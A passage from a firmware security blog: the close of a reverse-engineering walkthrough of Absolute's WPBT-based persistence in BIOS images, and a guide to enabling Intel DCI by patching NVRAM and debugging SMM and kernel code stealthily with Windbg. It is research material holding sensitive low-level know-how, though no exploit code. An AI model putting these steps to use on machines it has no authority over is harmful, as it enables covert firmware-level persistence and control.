memory search. We can find the GUID at 0x800050e0 as shown below.<o:p></o:p></p><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-HTNcqBxxPrKJGvQUztve9p_qSyu8ju7u-OgbiSk3gm3SgiRHzoFb3-0Aq7qf9bbr2LDP4pmmrGHIXDafTDcj7RkP2Enlb0Ls8yThedQjZ3LkjGDCHgZH_H0MSa4-HQcyTlHC99Pn4k4/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="442" data-original-width="1118" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-HTNcqBxxPrKJGvQUztve9p_qSyu8ju7u-OgbiSk3gm3SgiRHzoFb3-0Aq7qf9bbr2LDP4pmmrGHIXDafTDcj7RkP2Enlb0Ls8yThedQjZ3LkjGDCHgZH_H0MSa4-HQcyTlHC99Pn4k4/w640-h253/image.png" width="640" /></a></div></div><br />By cross-referencing 0x800050e0, we can find the function using the GUID and calling StartImage().</div><div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhISvx0-NLGgTyha0MZItWg3Vvd5fEs0XKI6KATlboCTSwMQ-mqewIRrT74eQkGMT1o42-QttoEGlULXu49We2ApuenF35_zeoXDs4QgNyC-jcKfhBJMg_ntvooNcS-MffJtK2Sz6-nbPk/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="279" data-original-width="501" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhISvx0-NLGgTyha0MZItWg3Vvd5fEs0XKI6KATlboCTSwMQ-mqewIRrT74eQkGMT1o42-QttoEGlULXu49We2ApuenF35_zeoXDs4QgNyC-jcKfhBJMg_ntvooNcS-MffJtK2Sz6-nbPk/s16000/image.png" /></a></div><p class="MsoNormal">As we inspect the FUN_80002fe8 called above, it becomes obvious that the function calls LoadImage() with the GUID as input, and then, StartImage() is called, which launches the application.<o:p></o:p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWBcfm36o8KKsyBE-rdLm50Y2ILB5tTvyKgfMEe1MedYxQ1Z6UPtoSSuhFN89MFrzoiCtDc86D641H-eitrjewqWYEx2ya16MEnUZnOpI9EBzT7YVXAYJ2kJDvTLS6FAg19iz3gnpoJHc/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="623" data-original-width="613" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWBcfm36o8KKsyBE-rdLm50Y2ILB5tTvyKgfMEe1MedYxQ1Z6UPtoSSuhFN89MFrzoiCtDc86D641H-eitrjewqWYEx2ya16MEnUZnOpI9EBzT7YVXAYJ2kJDvTLS6FAg19iz3gnpoJHc/s16000/image.png" /></a></div><p class="MsoNormal">When are those functions called? By cross referencing the
function, we can find that the pointer of the function is passed to the CreateEventEx() with EFI_EVENT_READY_TO_BOOT_GUID. <o:p></o:p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_nEIpziOC_O9k1jJ_zPlpS3Vq4KuShprVUJoYKJi98vR3L5-BjBLp1fqcvdaeSbxgtfbKbaQiAaucnXd41iNY4JnJFFoCsQbfdCyGh-WYbEbV1RqvFx6iLrG9TqKxpHqhm4nO9cZCPmo/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="116" data-original-width="428" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_nEIpziOC_O9k1jJ_zPlpS3Vq4KuShprVUJoYKJi98vR3L5-BjBLp1fqcvdaeSbxgtfbKbaQiAaucnXd41iNY4JnJFFoCsQbfdCyGh-WYbEbV1RqvFx6iLrG9TqKxpHqhm4nO9cZCPmo/s16000/image.png" /></a></div><br />We can make better sense of this with <a href="https://www.blogger.com/#">the UEFI specification (PDF)</a>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSWF1q3P19IbWVFbKMpGUd-W7RBa0gMNaa8fzQTGN1ItHf2HVeDmRrpErXDCw1YxNojOB1k47ciCb0pERfz7gghaTVLwU5V6Xg80MfCqCnYq9EhNxXkrR2BsnZ6X4HBSJDMD5pzwKVWY4/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="217" data-original-width="329" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSWF1q3P19IbWVFbKMpGUd-W7RBa0gMNaa8fzQTGN1ItHf2HVeDmRrpErXDCw1YxNojOB1k47ciCb0pERfz7gghaTVLwU5V6Xg80MfCqCnYq9EhNxXkrR2BsnZ6X4HBSJDMD5pzwKVWY4/" width="320" /></a><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSWF1q3P19IbWVFbKMpGUd-W7RBa0gMNaa8fzQTGN1ItHf2HVeDmRrpErXDCw1YxNojOB1k47ciCb0pERfz7gghaTVLwU5V6Xg80MfCqCnYq9EhNxXkrR2BsnZ6X4HBSJDMD5pzwKVWY4/" style="margin-left: 1em; margin-right: 1em;"></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVBraf-ZEJekukYmHWiFnGpfuB0KtfLZA7tx3WBwQNIY_Dwv0QEl1rTjTFpVUiH1qs36lInG_hbkg9wnqBFt2Ky661_TEiLqrOUFswkKN8q8qRivIVJfUMHe0gvBbipx3Hshso6LCAEb0/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="72" data-original-width="426" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVBraf-ZEJekukYmHWiFnGpfuB0KtfLZA7tx3WBwQNIY_Dwv0QEl1rTjTFpVUiH1qs36lInG_hbkg9wnqBFt2Ky661_TEiLqrOUFswkKN8q8qRivIVJfUMHe0gvBbipx3Hshso6LCAEb0/s16000/image.png" /></a></div></div><p class="MsoNormal">As highlighted, the function is set as a callback for the
event that is called right before the OS boot loader starts. <o:p></o:p></p><p class="MsoNormal">To summarize the flow:<br /></p><ol style="text-align: left;"><li>The driver 8B778A74-C275-49D5-93ED-4D709A129CB1 is loaded by the platform software.</li><li>The driver 8B778A74-C275-49D5-93ED-4D709A129CB1 registers the event notification. </li><li>When the system is about to start the boot loader (eg, bootmgfw.efi and grub.efi), the event is signaled.</li><li>The driver 8B778A74-C275-49D5-93ED-4D709A129CB1 starts the application 821ACA26-29EA-4993-839F-597FC021708D.</li><li>The application 821ACA26-29EA-4993-839F-597FC021708D installs the WPBT ACPI table.</li><li>If Windows is booted, smss.exe creates wpbbin.exe from the table and executes it.</li></ol>This establishes the mechanism to auto start a Windows application, even if Windows is reinstalled. <p></p><h2 style="text-align: left;">More inter-module interactions</h2><p class="MsoNormal"><o:p></o:p></p><p class="MsoNormal">An astute reader might notice we have not looked into how the above flow can be activated, or skipped in case Absolute is not enabled by the user. Answering to this question requires further analysis of UEFI variables and
additional OEM-specific modules.</p><p class="MsoNormal">On the UEFI variables, Absolute uses few named as Abt* in the a0b1889e-00eb-445b-8ca9-e91ce43c907d namespace. They can be found as Unicode strings easily. </p><p class="MsoNormal"><o:p></o:p></p>
<p class="MsoNormal">On the additional modules, the below snippet indicates that the condition
to launch the applications is either:<o:p></o:p></p>
<p class="MsoNormal"></p><ul style="text-align: left;"><li>LocateProtocol() failed, or</li><li>LocateProtocol() succeeded and the bit 0 of the retrieved
data is set </li></ul><o:p></o:p><p></p>
<p class="MsoNormal"><o:p></o:p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwaS-EaSOObBO8Ri-eOfW-rOXgSjUXZ4xBKB9LSTAPpq4sHfLIKc96cJFsCXjQxZzCZNjuHuqpXP-9o4WhxMYQwQKi170XU4wMzcZLhd9Cw5yBShbBZv5F7HR73nfwqYm68G5cPwQyndk/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="261" data-original-width="475" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwaS-EaSOObBO8Ri-eOfW-rOXgSjUXZ4xBKB9LSTAPpq4sHfLIKc96cJFsCXjQxZzCZNjuHuqpXP-9o4WhxMYQwQKi170XU4wMzcZLhd9Cw5yBShbBZv5F7HR73nfwqYm68G5cPwQyndk/s16000/image.png" /></a></div><p class="MsoNormal">The first case does not appear to happen. The second case depends
on whether another module that installed the “unknownProtocol_fa02fb02” protocol
sets the bit on their side. Meaning that we would have to reverse engineer the
other module to determine the exact condition. <o:p></o:p></p>
<p class="MsoNormal">One can find the additional module by searching the protocol GUID
on UEFITool again. Those are modules I found on my laptops:<o:p></o:p></p><p class="MsoNormal"></p><ul style="text-align: left;"><li>0FEBE434-A6AF-4166-BC2F-DE2C5952C87D (DellAbsoluteDxe) in Dell
laptops</li><li>A81DD68E-F878-49FF-8309-798444A9C035 (AbtSmm) in an Acer
laptop</li><li>458034FD-DE82-44F1-8398-6D941F85F473 and 22E6FAB5-A6C4-4FF6-AE8C-C16939911BCD
in a HP laptop</li></ul><o:p></o:p><p></p>
<p class="MsoNormal"><o:p></o:p></p>
<p class="MsoNormal"><o:p></o:p></p><p class="MsoNormal">Analysis of the UEFI variable and OEM-specific modules is left as an exercise for
readers, as they differ across OEMs. </p><h2 style="text-align: left;">Conclusion</h2><p class="MsoNormal"><o:p></o:p></p><p class="MsoNormal">Through this exercise, we studied:<o:p></o:p></p>
<p class="MsoNormal"></p><ul style="text-align: left;"><li>How a BIOS image file can be extracted </li><li>How modules with tight dependency on Windows can be located </li><li>How the WBPT ACPI table may be used to establish persistency
on Windows</li><li>How events can be used for differed execution </li><li>How dependent modules may be located in the BIOS image</li><li>Using only freely available, cross-platform software </li></ul><o:p></o:p><p></p>
<p class="MsoNormal"><o:p></o:p></p>
<p class="MsoNormal"><o:p></o:p></p>
<p class="MsoNormal"><o:p></o:p></p>
<p class="MsoNormal"><o:p></o:p></p>
<p class="MsoNormal"><o:p></o:p></p>
<p class="MsoNormal">Hopefully, you found reverse engineering BIOS images was interesting and more
approachable than previously you thought. </p><p class="MsoNormal" style="text-align: left;"><o:p></o:p></p><p class="MsoNormal"><o:p></o:p></p><p></p><p class="MsoNormal"><o:p></o:p></p><div></div></div>Satoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.com1tag:blogger.com,1999:blog-2937860723034111347.post-68223931692150051832021-03-29T05:36:00.009-07:002021-03-29T05:50:56.948-07:00Debugging System with DCI and Windbg<p><span style="font-family: inherit;">This post introduces how one can debug the entire system including system management mode (SMM) code with Windbg and </span>Direct Connect Interface (DCI)<span style="font-family: inherit;">. As an example use case, we will debug the exploit of the kernel-to-SMM local privilege escalation vulnerability I reported.</span></p><p>For more details about the vulnerability and its implications, please refer to <a href="https://github.com/tandasat/SmmExploit">the GitHub repository</a>. This post focuses on DCI and Windbg.</p><h2 style="text-align: left;"><span style="font-family: inherit;">Summary</span></h2><div><span style="font-family: inherit;">DCI is a stealthy, accessible and very powerful technology for kernel/firmware debugging and reverse engineering, and Intel Debug Extensions for WinDbg lets us use it through Windbg's already-familiar commands and GUI. This can speed up your security research.</span></div><h2 style="text-align: left;">What is Direct Connect Interface?</h2><p>Direct Connect Interface (DCI) is the Intel hardware provided debugging interface. It allows developers to debug the whole system without depending on a software provided debugging mechanism, such as Windows' kernel debugging subsystem and firmware (EDK2)'s Debug Agent. </p><p>As DCI is implemented by hardware, the debugger using this interface is capable of debugging a greater range of code including the reset vector and one that runs on the system management mode (SMM). This makes DCI an attractive tool for both developing and reverse engineering firmware, for example. </p><p>For a more comprehensive overview of the DCI technology, I strongly recommend taking time to watch the video from Intel and reading a document by the Slim Bootloader team: </p><p></p><ul style="text-align: left;"><li><a href="https://software.intel.com/content/www/us/en/develop/videos/introduction-of-system-debug-and-trace-in-intel-system-studio-2018.html">Introduction of System Debug and Trace in Intel® System Studio 2018</a></li><li><a href="https://slimbootloader.github.io/developer-guides/debugging-with-cca.html">Source Level Debugging with Intel(R) SVT CCA</a></li></ul><p></p><h2 style="text-align: left;">Does my system support DCI? </h2><p>DCI is available on Skylake (6th gen) or later and some of Atom and Xeon models. However, older generations support only a connection type called DCI OOB and require an expensive adapter, as shown in the below table. </p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn4GTKtuaGtJETMBhQ01lD2KDGENGyabjpXz5LFnMdVlG1o5BP16esBjVS07ntcGcl1aILhSySHmXa8VPVM1JCZxGUywfS-xHrAe_Bg77k8QF6i0AtPZnqE5gPVBicstrAuhXdVOEa6gY/s1373/Untitled.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="238" data-original-width="1373" height="69" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn4GTKtuaGtJETMBhQ01lD2KDGENGyabjpXz5LFnMdVlG1o5BP16esBjVS07ntcGcl1aILhSySHmXa8VPVM1JCZxGUywfS-xHrAe_Bg77k8QF6i0AtPZnqE5gPVBicstrAuhXdVOEa6gY/w401-h69/Untitled.png" width="401" /></a></div><p style="text-align: left;">If your <u>target system</u> is 7th gen or newer, DCI DbC is supported, and all you need to buy is a USB cable without the VBus. Buy <a href="https://www.mouser.ca/ProductDetail/Intel/ITPDCIAMAM1M/?qs=%2Fha2pyFaduhPSyNa3fmz2l6GBhukNAU2JZ0iVal5h9Gx1DmpZe2dNg%3D%3D">ITPDCIAMAM1M</a> or <a href="https://www.datapro.net/products/usb-3-0-super-speed-a-a-debugging-cable.html">DataPro's one</a> if the target system has the type-A USB port, or <a href="https://www.mouser.ca/ProductDetail/Intel/ITPDCIAMCM1M/?qs=qSfuJ%252Bfl%2Fd7ZnYa8%2FOX23w%3D%3D">ITPDCIAMCM1M</a> for the type-C USB port. I suggest buying both since I had a device that only worked with the type-C port. </p><p style="text-align: left;">If your target system is 6th gen, DbC is not supported, and you need to buy an expensive adapter called CCA (<a href="https://www.mouser.ca/ProductDetail/Intel/EXIBSSBADAPTOR/?qs=%2Fha2pyFaduh20SJk2oUOfx1pP3lhHLWrr6c1ZbRk%252BvBoB%2Fw7C9HcNg%3D%3D">EXIBSSBADAPTOR</a>). It is expensive but allows you to debug code even from the reset vector, which is not supported by DbC.</p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGCDfoS0NFwFtojd8DipD0eKIwK4AJJEWoSja9hxAVqnqitKlAHV5H_exhF0zc0PCnzHpS2QyT7Nonc_AncE7KVU5FnV12DjcehErTzQcTgVsOb_l8vsnQy1M9u9c-3lUfW2QutYpzNiU/s2728/Untitled.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="555" data-original-width="2728" height="130" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGCDfoS0NFwFtojd8DipD0eKIwK4AJJEWoSja9hxAVqnqitKlAHV5H_exhF0zc0PCnzHpS2QyT7Nonc_AncE7KVU5FnV12DjcehErTzQcTgVsOb_l8vsnQy1M9u9c-3lUfW2QutYpzNiU/w640-h130/Untitled.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">DCI connection types <br />(from <a href="https://2019.osfc.io/talks/debugging-intel-firmware-using-dci-usb-3-0.html">Debugging Intel Firmware using DCI & USB 3.0</a> by Intel)</td></tr></tbody></table><div><p style="text-align: left;">There is no notable requirement for the host system, and one can use a USB-C-to-A adapter if needed.</p><p style="text-align: left;">The complete list of supported models can be found in <a href="https://software.intel.com/content/www/us/en/develop/articles/intel-system-debugger-release-notes.html">the release notes of Intel System Debugger</a>, which we will be looking at shortly. </p><h2 style="text-align: left;">Is DCI enabled on the target?</h2></div><p style="text-align: left;">If IA32_DEBUG_INTERFACE[0] is set, DCI is enabled. Use a kernel debugger or <a href="http://rweverything.com/">RWEverything</a> to check this. For obvious reasons, DCI should be disabled by default on systems in the market. If not, report it to the OEM. It is a vulnerability (see <a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00127.html">CVE-2018-3652</a>). </p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVo0ztcWHtQARFt5NwOuERk2Mk21IGDGBvS5RHtFQJpFUonjDmKzqjkxIRpaCy_8P2e_-Uk8eBcU6x3vLyUKfx5XdMPGl1UEAkDRWMtYhDt2tVzHNI1kVChC335mUhAOxzOd7oRYdJCFM/s907/Screenshot+2021-01-21+203340.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="201" data-original-width="907" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVo0ztcWHtQARFt5NwOuERk2Mk21IGDGBvS5RHtFQJpFUonjDmKzqjkxIRpaCy_8P2e_-Uk8eBcU6x3vLyUKfx5XdMPGl1UEAkDRWMtYhDt2tVzHNI1kVChC335mUhAOxzOd7oRYdJCFM/w640-h142/Screenshot+2021-01-21+203340.jpg" width="640" /></a></div><h2 style="text-align: left;">How can I enable DCI? </h2><p style="text-align: left;">There is a couple of ways to do this: changing BIOS settings or patching NVRAM with RU.efi</p><p></p><h3 style="text-align: left;">BIOS settings </h3><p style="text-align: left;">Very occasionally, BIOS settings offer an option to enable DCI. I have seen a couple of configuration names for this purpose as listed below. Enable them if available. </p><p style="text-align: left;"></p><ul style="text-align: left;"><li>CPU Run Control</li><li>Enable HDCIEN</li></ul><div>I had a case where the configuration was available but had no effect on IA32_DEBUG_INTERFACE. </div><p></p><h3 style="text-align: left;">Patching NVRAM with RU.efi</h3><p style="text-align: left;">The BIOS settings for DCI is often hidden in the production systems, but one can make the same effect as changing the settings by overwriting NVRAM storing the setting values. This is a bit involved process but explained in multiple articles as listed below. Here are the highlights of the steps.</p><p style="text-align: left;"></p><ol style="text-align: left;"><li>Extract BIOS using software like <a href="https://github.com/chipsec/chipsec">Chipsec</a></li><li>Extract a module 899407D7-99FE-43D8-9A21-79EC328CAC21 ("Setup") with <a href="https://github.com/LongSoft/UEFITool">UEFITool</a></li><li>Extract human readable representation of BISO menu implementation with <a href="https://github.com/LongSoft/Universal-IFR-Extractor">IFR Extractor</a></li><li>Find offsets of the following setting names and the value to set, as denoted with =></li></ol><ul style="text-align: left;"><ul><li>Debug Interface => Enabled (1)</li><li>Debug Interface Lock => Disabled (0)</li><li>DCI enable (HDCIEN) => Enabled (1)</li><li>Platform Debug Consent => Enabled (DCI OOB+[DbC]) (1)</li><li>CPU Run Control => Enabled (1)</li><li>CPU Run Control Lock => Disabled (0)</li><li>PCH Trace Hub Enable Mode => Host Debugger (2)<br />(Not all of them are found. It depends on BIOS) </li></ul></ul><ol style="text-align: left;"><li>Download <a href="https://ruexe.blogspot.com/">RU.efi</a>, boot the system into UEFI shell and start RU.efi</li><li>Alt+=, select "Setup", and change the found offset values. Commit changes and reboot.</li></ol><h4 style="text-align: left;">References</h4><div><ul style="text-align: left;"><li><a href="https://gist.github.com/eiselekd/d235b52a1615c79d3c6b3912731ab9b2">Enable DCI debugging on Gigabyte-BKi5HA-7200</a></li><li><a href="https://casualhacking.io/blog/2019/6/2/debug-uefi-code-by-single-stepping-your-coffee-lake-s-hardware-cpu">Debug UEFI code by single-stepping your Coffee Lake-S hardware CPU</a></li><li><a href="https://nstarke.github.io/0037-modifying-bios-using-ru-efi.html">Modifying BIOS Using RU.EFI</a></li><li><a href="https://jp3bgy.github.io/blog/intel_dci/2019/02/09/Do-Intel-DCI.html">そうだ、Intel DCIをしよう!</a> & <a href="https://jp3bgy.github.io/blog/intel_dci/2019/12/01/Do-Intel-DCI-sequel.html">Intel DCI 続編(資料まとめ)</a> (Japanese) </li></ul></div><div>Note that some articles instruct you to change the following, but I did not have to do so. I do not think those are relevant.</div><div><ul style="text-align: left;"><li>Enable/Disable IED (Intel Enhanced Debug)</li><li>xDCI Support</li></ul></div><div>Some device did not have the Setup module, some had but did not reflect changes into IA32_DEBUG_INTERFACE, and some did change IA32_DEBUG_INTERFACE but did not let me to connect anyway. I gave up on those cases. </div><p style="text-align: left;">For completeness, <a href="https://www.win-raid.com/t596f39-Intel-Management-Engine-Drivers-Firmware-amp-System-Tools.html">Intel Flash Image Tool</a> (FIT) is another tool that can patch firmware and enable DCI. While I have never tried it yet, I heard recommendations of this tool from multiple sources.</p><h2 style="text-align: left;">How can I connect the target via DCI? </h2><div>Intel System Debugger needs to be installed in the host for connection. Intel System Debugger comes as part of Intel System Studio (ISS), which can be downloaded from this link.</div><div><ul style="text-align: left;"><li><a href="https://dynamicinstaller.intel.com/system-studio/">https://dynamicinstaller.intel.com/system-studio/</a></li></ul></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmBwpUolK9QVO4Cb2Gfc1REpKudcgkpuZYwKNhSKNCDStwMv04pHZdo8VF6TYa5eimNjqvZXs0NjKmGUddb8N3MpXmD_2yPBAiB6LAa0aqBFnTIrCPXLcF1d_STetStuaYYI16yBKTB94/s3561/Screenshot+2021-01-23+124557.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="852" data-original-width="3561" height="153" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmBwpUolK9QVO4Cb2Gfc1REpKudcgkpuZYwKNhSKNCDStwMv04pHZdo8VF6TYa5eimNjqvZXs0NjKmGUddb8N3MpXmD_2yPBAiB6LAa0aqBFnTIrCPXLcF1d_STetStuaYYI16yBKTB94/w640-h153/Screenshot+2021-01-23+124557.png" width="640" /></a></div><br /><div>Select "Get the Full System Studio Package" then download the "Standalone Offline Installer".<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhflqm3Q1uC56Arvj6V2olxpBKs1BuVd3OhuHue_L3OS74-SKMFTrtpHld_4O_oulKRAljWc3bisaj7maj-9-YbcoMZS1Re53OxPFquOIEGz8M1HbSzKrANoTRMiwp40TYET4EIwAQbKOg/s2980/Screenshot+2021-01-23+124627.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1055" data-original-width="2980" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhflqm3Q1uC56Arvj6V2olxpBKs1BuVd3OhuHue_L3OS74-SKMFTrtpHld_4O_oulKRAljWc3bisaj7maj-9-YbcoMZS1Re53OxPFquOIEGz8M1HbSzKrANoTRMiwp40TYET4EIwAQbKOg/w640-h226/Screenshot+2021-01-23+124627.png" width="640" /></a></div></div><div> </div><div>Beware of that Intel has transitioned from ISS to a different product set and rebranded System Debugger as <a href="https://software.intel.com/content/www/us/en/develop/tools/oneapi/system-bring-up-toolkit.html">Intel System Bring-up Toolkit</a>, which requires NDA to download. The above download link is still alive as of this writing but maybe shutdown in the future. </div><div><br /></div><div>On installation, make sure to install Intel System Debugger at least. Once you install ISS, here are some pages you can refer to for connecting to the target via ISS:</div><p style="text-align: left;"></p><ul style="text-align: left;"><li><a href="https://software.intel.com/content/www/us/en/develop/videos/debugging-edk-ii-based-firmware-image-using-isd.html?wapkw=slim%20bootloader">Debugging EDK II Based Firmware Image Using Intel® System Debugger</a> (Video)</li><li><a href="https://slimbootloader.github.io/developer-guides/debugging-with-cca.html">Source Level Debugging with Intel(R) SVT CCA</a> </li><li><a href="https://software.intel.com/content/www/us/en/develop/documentation/system-debug-legacy-user-guide/top/intel-system-debugger-startup/starting-and-finishing-a-debugging-session.html">User Guide - Starting and Finishing a Debugging Session </a></li></ul><p></p><p style="text-align: left;">I recommend a legacy version of it for simplicity. It can be launched with </p><p style="text-align: left;"><span style="background-color: black; color: white; font-family: courier; font-size: x-small;">C:\Program Files (x86)\IntelSWTools\sw_dev_tools\system_debugger_2020\system_debug_legacy\xdb.bat</span></p><h3 style="text-align: left;">Tips for diagnosing connection issues</h3><div><ul style="text-align: left;"><li>Intel System Debugger Target Indicator is helpful to identify the possible cause. Make use of it</li></ul></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA3bqpWhtg4b4dt5kt8DZxCM0bL_N_thPn5UIp_aEd0jrTRWFAMs97OQdIp9FkziHbwu_9zxQjj0NSlVx-T8JBtW3ZjrYqMI7P-sDbnEPxwwIe13R9rX5aPJxsHOQbMGt6YWaZ7Xmpojg/s2286/iss_target.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="464" data-original-width="2286" height="81" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA3bqpWhtg4b4dt5kt8DZxCM0bL_N_thPn5UIp_aEd0jrTRWFAMs97OQdIp9FkziHbwu_9zxQjj0NSlVx-T8JBtW3ZjrYqMI7P-sDbnEPxwwIe13R9rX5aPJxsHOQbMGt6YWaZ7Xmpojg/w400-h81/iss_target.png" width="400" /></a><span style="text-align: left;"> </span></div><ul style="text-align: left;"><li>Not all ports work. For example, one of my devices could be debugged only via the type-C port. Try different ports. Sometimes reboot and simply yanking and reconnecting the cable fixes an issue.</li></ul><h2 style="text-align: left;">Intel Debug Extensions for WinDbg</h2><p style="text-align: left;">The installer should have installed the extension that lets you debug the target with Windbg through DCI. To use the extension, the extended debug interface (EXDI) IPC COM server needs to be registered on the host with the following commands: </p><div><span style="font-family: courier;">----</span></div><span style="font-family: Consolas; font-size: x-small;">> cd "C:\Program Files (x86)\IntelSWTools\sw_dev_tools\system_debugger_2020\windbg-ext\iajtagserver\intel64"<br />> regsvr32 ExdiIpc.dll</span><div><span style="font-family: courier;">----</span><br /><p style="text-align: left;">Then, reboot the host system. </p><p style="text-align: left;">Start the Intel System Debugger Developer Shell from the start menu and type "windbg_dci"</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiqNNwvLWFRYIJB_sVE2lSO8Dkg2emw9vqqK9nbgDNpk0nbcHRzemXwTMm-t9cI_36VpvyUAM5BqN-gVjQgU3W0aehByTR61p5lZpTIr0P6s4qMKl0ZRd8atsct146wA85RB8Z44_AXS8/s2316/iss_shell.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="375" data-original-width="2316" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiqNNwvLWFRYIJB_sVE2lSO8Dkg2emw9vqqK9nbgDNpk0nbcHRzemXwTMm-t9cI_36VpvyUAM5BqN-gVjQgU3W0aehByTR61p5lZpTIr0P6s4qMKl0ZRd8atsct146wA85RB8Z44_AXS8/w640-h104/iss_shell.png" width="640" /></a></div><p style="text-align: left;">Once the connection is successfully established, type "windbg()" </p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgN1RILoiPQgMr0zkr4P3YxXZnfbqw61QrJ9RUIG5jz66rHaef7V3j6ZOcsdPXP9vnu62C9rLcW8owoLAhm517ry1uvyPCpWYApwHN71N9SEFvivsxt3uF8OXu4D1QRZGW2RXSF334ZlnA/s2048/winfnbg.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="2048" data-original-width="2045" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgN1RILoiPQgMr0zkr4P3YxXZnfbqw61QrJ9RUIG5jz66rHaef7V3j6ZOcsdPXP9vnu62C9rLcW8owoLAhm517ry1uvyPCpWYApwHN71N9SEFvivsxt3uF8OXu4D1QRZGW2RXSF334ZlnA/w640-h640/winfnbg.png" width="640" /></a></div><p style="text-align: left;">Windbg should start, show disassembly and register values, and accept most of the commands like .reload if successful. </p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhquAm9BSJXrm2r5gvYg7TwA6SjCqTejNFDOl1kJJuhV4XRyg0X2c8kDtMXJQ1XymQUgjqF5CN1CgzaWbVG3rSaIV8TUnlI79Iz6XoGG3IE4o_rop6hQavbR1yAMmRmEkOHlUQlHxDV5FU/s2048/winfnbg.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1387" data-original-width="2048" height="434" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhquAm9BSJXrm2r5gvYg7TwA6SjCqTejNFDOl1kJJuhV4XRyg0X2c8kDtMXJQ1XymQUgjqF5CN1CgzaWbVG3rSaIV8TUnlI79Iz6XoGG3IE4o_rop6hQavbR1yAMmRmEkOHlUQlHxDV5FU/w640-h434/winfnbg.png" width="640" /></a></div><br /><div>While the extension does work with Windows specific bits as if it were the standard kernel debugging session, it does not depend on the kernel debugging mechanism as indicated by some Kd flags. If you are looking for a stealthy kernel debugging tool, DCI is for you.</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNqhKXEV4kXpS5wf7G0FthmXdA4Hzl3Cr3h_lAM1LIU2mpbglmRB6SpPump2CIRcQE-TtNVgBTG1wy1cLo2O2mSEKaHTyRH5_6J5ZN5cUy9tn71b-qJZnalzk2xwvXhMsD1v-_GGN0iUs/s860/Untitled.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="352" data-original-width="860" 